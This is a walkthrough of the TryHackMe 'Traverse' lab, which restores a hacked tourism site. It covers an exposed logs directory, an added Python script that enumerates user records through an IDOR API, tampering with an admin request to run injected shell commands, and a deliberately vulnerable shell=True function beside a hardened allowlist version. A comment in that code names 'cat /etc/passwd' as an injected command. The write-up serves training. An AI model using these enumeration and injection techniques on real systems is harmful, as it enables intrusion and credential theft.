Room: https://tryhackme.com/room/traverse
Challenge your secure coding skills to restore a compromised website.
Difficulty: Easy
Author: 1337rce, https://tryhackme.com/p/1337rce
Version: traversev6
Bob is a security engineer at a firm and works closely with the software/DevOps team to develop a tourism web application. Once the website was moved from QA to Production, the team noticed that the website was getting hacked daily and wanted to know the exact reason. Bob consulted the blue team as well but has yet to be successful. Therefore, he finally enrolled in the Software Security pathway at THM to learn if he was doing something wrong.
Can you help Bob find the vulnerabilities and restore the website?
Questions:
What type of encoding is used by the hackers to obfuscate the JavaScript file?
What is the flag value after de-obfuscating the file?
Logging is an important aspect. What is the name of the file containing email dumps?
The logs folder contains email logs and has a message for the software team lead. What is the name of the directory that Bob has created?
What is the key file for opening the directory that Bob has created for Mark?
What is the ID for the user with admin privileges?
The attacker uploaded a web shell and renamed a file used for managing the server. Can you find the name of the web shell that the attacker has uploaded?
What is the name of the file renamed by the attacker for managing the web server?
Can you use the file manager to restore the original website by removing the “**FINALLY HACKED**” message? What is the flag value after restoring the main website?
So let’s start the machine and go to the IP: http://MACHINE_IP/
When I go to the site I am presented with a “FINALLY HACKED !!! I HATE MINIFIED JAVASCRIPT” text.
Let’s check the source code, either right-click and choose “View Page Source” or just press CTRL+U.
I found this snippet, and of course I need to check on “custom.min.js”:
<script src='/tailwind.min.js'></script> <!-- THIS IS OFFICIAL FILE - DO NOT CHANGE IT -->
<script src='custom.min.js'></script> <!-- THIS IS CUSTOM JS FILE-->
So we got this, and it looks a lot like an encoding we are familiar with.
Let’s work with CyberChef: https://gchq.github.io/CyberChef/. After decoding I get a compressed (minified) JavaScript file, so after un-minifying it I get JavaScript that is readable:
(function () {
  function doNothing() {}
  var n = "DIRECTORY";
  var e = "LISTING";
  var o = "IS THE";
  var i = "ONLY WAY";
  var f = null;
  var l = false;
  var d;
  if (f === null) {
    console.log("Flag:" + n + " " + e + " " + o + " " + i);
    d = undefined;
  } else if (typeof f === "undefined") {
    d = undefined;
  } else {
    if (l) {
      d = undefined;
    } else {
      (function () {
        if (d) {
          for (var n = 0; n < 10; n++) {
            console.log("This code does nothing.");
          }
          doNothing();
        } else {
          doNothing();
        }
      })();
    }
  }
})();
I made it easy for myself: after a quick review of the code for eval() calls and other evil code, I just ran it in the browser console.
Open the web tools with F12; at least in Firefox you need to type “allow pasting” in the console before pasting a script.
The output points us to a directory listing misconfiguration. And of course, remember the comment on the main page?
<!-- <li><a href="./logs" class="hover:text-gray-300">Logs</a></li> DevOps team to check and remove it later on -->
So let’s check out http://MACHINE_IP/logs/
In there is a file whose name is one of the answers to the questions.
Within this file we have a “password” and a clue to another directory, a wink to SSDLC. When you type in the correct directory you are presented with a dialog asking for the password, and once logged in you see the API documentation:
With that documentation in hand it is just a matter of enumerating the API.
For example, when calling
http://MACHINE_IP/api/?obfuscated_id=1 you get a JSON object with name, email and password among other things. Note that the only thing “protecting” a record is the number in the URL: there is no authorization check tying the id to the logged-in user.
So just increment the number until you get the answers to the questions.
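Incrementing the id by hand works for a handful of records; the script below automates it. This is an added example written for this page, not code from the room or the original write-up. The endpoint path and the obfuscated_id parameter come from the write-up; the JSON field names (id, name, email, password, role), the stop-after-N-misses heuristic and the constructed FakeApi records are assumptions made so the example runs offline. Against the live machine you would swap fake_fetch for http_fetch.

```python
"""
Enumerate /api/?obfuscated_id=N and pick out the privileged account.

Added example (not the room's code). Field names, the 'role' attribute and
the FAKE_RECORDS below are constructed assumptions for offline testing.
"""
import json
from typing import Callable, Dict, List, Optional

BASE_URL = "http://MACHINE_IP/api/"   # path taken from the write-up

# Constructed stand-in for the backend. None of this is real room data.
FAKE_RECORDS: Dict[int, Dict] = {
    1: {"id": 1, "name": "alice", "email": "alice@example.com", "password": "p1", "role": "user"},
    2: {"id": 2, "name": "bob",   "email": "bob@example.com",   "password": "p2", "role": "user"},
    3: {"id": 3, "name": "carol", "email": "carol@example.com", "password": "p3", "role": "admin"},
}


def fake_fetch(obfuscated_id: int) -> Optional[str]:
    """Pretend HTTP GET: return the JSON body, or None where the API would 404."""
    rec = FAKE_RECORDS.get(obfuscated_id)
    return json.dumps(rec) if rec else None


def http_fetch(obfuscated_id: int) -> Optional[str]:
    """Real fetcher for the live machine (needs the requests package; unused offline)."""
    import requests
    r = requests.get(BASE_URL, params={"obfuscated_id": obfuscated_id}, timeout=5)
    return r.text if r.status_code == 200 else None


def enumerate_ids(fetch: Callable[[int], Optional[str]],
                  start: int = 1, max_misses: int = 3) -> List[Dict]:
    """Walk obfuscated_id upward from `start`, stopping after `max_misses`
    consecutive responses that are empty or not a JSON object."""
    found: List[Dict] = []
    misses, current = 0, start
    while misses < max_misses:
        body = fetch(current)
        try:
            rec = json.loads(body) if body else None
        except json.JSONDecodeError:
            rec = None
        if isinstance(rec, dict) and rec:
            found.append(rec)
            misses = 0
        else:
            misses += 1
        current += 1
    return found


def find_admins(records: List[Dict]) -> List[Dict]:
    """Return the records whose (assumed) 'role' field marks them as admin."""
    return [r for r in records if str(r.get("role", "")).lower() == "admin"]


if __name__ == "__main__":
    records = enumerate_ids(fake_fetch)
    for r in records:
        print(f"id={r['id']:<3} name={r['name']:<8} email={r['email']}")
    print("admin ids:", [r["id"] for r in find_admins(records)])
```

The fetch function is injected so the same enumeration loop runs against the constructed records and against the live API; the stop heuristic avoids looping forever when ids are sparse, which you would tune (or replace with a fixed upper bound) on a real target.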
In one of the API entries we get an admin endpoint and credentials. Let’s go to that one; once logged in to the admin part you are presented with what are basically system calls. We get 2 options:
“System Owner”
“Current Directory”
But as always, just because these are the only options presented does not mean they are the only options you can send. Let’s hijack the request!
You can do it with Burp Suite and its Proxy, or the more hacky way: the Network tab in the browser’s web tools, right there in the browser (“Edit and Resend”).
The original request body consists of “command=whoami”, so just edit and resend that request with a new command.
Replace “whoami” with “ls -al” and the output will be:
Password for accessing original file manager: THM{10101}
total 212
drwxrwxrwx 2 ubuntu ubuntu 4096 May 26 09:13 .
drwxrwxrwx 9 root root 4096 Jun 2 13:05 ..
-rwxrwxrwx 1 ubuntu ubuntu 2425 May 26 06:25 index.php
-rwxrwxrwx 1 ubuntu ubuntu 2879 May 26 07:08 main.php
-rwxrwxrwx 1 ubuntu ubuntu 193541 May 26 09:12 ObfuscatedFileForAnswer.php
-rwxrwxrwx 1 ubuntu ubuntu 70 May 26 09:31 obfuscatedShell.php
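The reason the swap from “whoami” to “ls -al” works is that the admin page ships the command string itself in the request and the server runs whatever arrives. The block below is an added example written for this page, not the room’s PHP or the write-up’s code: it reconstructs that pattern in Python next to a hardened version where the request carries an action name that is looked up in a fixed allowlist. The two action names mirror the two menu entries from the write-up; the function names, the allowlist contents and the ActionNotAllowed error are assumptions.

```python
"""
Command-injection-by-design versus an allowlisted action dispatcher.

Added example (not code from the room). Action names and allowlist are
assumptions; the menu entries and whoami/ls come from the write-up.
"""
import subprocess
from typing import Dict, List


# --- Vulnerable pattern: the request body IS the command -------------------
def run_command_vulnerable(command: str) -> str:
    """Equivalent of the admin page: hand the 'command' parameter to a shell.
    shell=True means 'whoami' and 'ls -al' (or 'id; cat /etc/passwd') are
    treated exactly alike, so any client can run anything."""
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


# --- Hardened pattern: the request carries a name, the server owns the argv --
ALLOWED_ACTIONS: Dict[str, List[str]] = {
    "system_owner":      ["whoami"],   # "System Owner" menu entry
    "current_directory": ["pwd"],      # "Current Directory" menu entry
}


class ActionNotAllowed(ValueError):
    """Raised for any action name that is not in the allowlist."""


def resolve_action(action: str) -> List[str]:
    """Map an action name from the request to a fixed argv list.
    Anything not in the table is rejected; no string from the client
    ever reaches a shell or an argv element."""
    try:
        return list(ALLOWED_ACTIONS[action])
    except KeyError:
        raise ActionNotAllowed(f"unknown action {action!r}") from None


def run_action(action: str) -> str:
    """Execute an allowlisted action with shell=False and a fixed argv."""
    argv = resolve_action(action)
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Demonstration only: the vulnerable path obeys whatever it is given.
    print("vulnerable:", run_command_vulnerable("echo injected").strip())
    print("hardened  :", run_action("system_owner").strip())
    for attempt in ("ls -al", "whoami", "system_owner; id"):
        try:
            resolve_action(attempt)
        except ActionNotAllowed as exc:
            print("rejected  :", exc)
```

The point of the hardened version is not input filtering: even a raw “whoami” is refused, because the client is never allowed to name a binary, only a menu entry. That is the same structural fix that would have stopped the “ls -al” tampering used to find the file manager and the web shell.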
So let’s get to the original file manager, the obfuscated file in the listing above, using the password printed by the admin command.
Within index.php there is a PHP snippet and the flag is there in clear text, so for the challenge part we are done.
But if you want to do it completely: just change the variable “$message” to something else, like “Not Hacked”, and save the file.
And then your website will look like this:
Room complete!
So this was a room connected to the Security Engineer path, so it was a lot of SSDLC and API insecurities: directory listing, an obfuscated client-side file, sequential ids with no authorization check, and an admin page that runs whatever command the request names. It was a fun room at a good level; for the last parts you need some basic Linux commands, but overall a good starter.